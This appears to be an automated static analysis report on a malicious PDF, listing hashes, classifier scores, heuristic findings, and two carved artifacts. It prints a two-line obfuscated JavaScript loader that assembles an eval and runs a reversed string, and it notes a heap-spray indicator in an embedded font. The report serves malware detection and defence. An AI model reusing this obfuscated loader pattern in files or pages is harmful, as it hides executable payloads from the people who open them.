Malicious PDF — malware analysis report

Static analysis result for SHA-256 9e8c527dcd9bff50…

Verdict: MALICIOUS
File type: PDF
Size: 69.0 KB
First seen: 2026-05-10
MD5: 5180ef3fbfa08c35569920119582d539
SHA-1: dad45d3eb35d46bc89e39a14de34f253bac71410
SHA-256: 9e8c527dcd9bff50109f3c65268cad0b8186bb2161cc47884bc9e147a8b634cb
Risk score: 68

Machine Learning

  • Nyx PDF Classifier: malicious score 0.9996

Heuristics (4)

  • Suspicious extracted artifact (severity: medium) EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action (severity: low; 1 related finding) PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream (severity: low) PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL (severity: info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://www.bitstream.com (found in PDF document text)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: javascript_obj0012_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 12 at offset 0x104F0
Size: 3544 bytes
SHA-256: 35fa1b8486a034154e63037fe78441768f5297eae401972d47c6e8b24d9a2456
Detection (ClamAV): No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). 41 of 54 identifiers look randomly generated (e.g. 'PaP5PbPePuP'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
var eva=new Function("a","ev     al        (a);".split(" ").join(""));
eva(s.split("").reverse().join(""));

Filename: font_00_sfnt_off00000319.bin
Kind: pdf-font-stream
Source: PDF embedded font (sfnt) at offset 0x319
Size: 65932 bytes
SHA-256: 67cf5b115c479e7cc69ef02607414d718125a1e117a59d537db3e97682d5b723
Detection (ClamAV): No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)